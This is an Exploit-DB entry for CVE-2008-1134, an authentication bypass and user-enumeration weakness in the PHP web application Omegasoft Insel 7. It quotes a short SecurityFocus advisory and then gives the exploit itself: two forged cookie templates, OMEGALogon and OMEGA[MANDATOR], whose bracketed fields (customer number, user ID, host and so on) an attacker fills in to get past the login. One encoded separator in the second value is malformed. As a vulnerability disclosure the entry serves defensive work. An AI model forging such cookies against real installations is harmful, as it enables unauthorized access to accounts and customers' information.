Omegasoft Insel 7 - Authentication Bypass Vulnerability and User Enumeration Weakness

2008-01-09T00:00:00
ID EDB-ID:31003
Type exploitdb
Reporter MC.Iglo
Modified 2008-01-09T00:00:00

Description

Omegasoft Insel 7 Authentication Bypass Vulnerability and User Enumeration Weakness. CVE-2008-1134. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/27210/info

Omegasoft Insel is prone to an authentication bypass vulnerability and a user-enumeration weakness.

An attacker can exploit these issues to obtain sensitive information and gain unauthorized access to the application.

These issues affect Omegasoft Insel 7; other versions may also be affected. 

Cookiename: OMEGALogon
value:[MANDATOR]%7C[CUSTOMERNUMBER]%7C[USERID]%7C%7CArial%7CArial%7C%2D%2D%2D%2D%2D%2D%7C[SURNAME]%2C+[NAME]%7C%7C%7C[LASTLOGINTIME]%7C

Cookiename: OMEGA[MANDATOR]
value: [USERID]%7C[CUSTOMERNUMBER]%7[HOST]%7C[DATE]%7C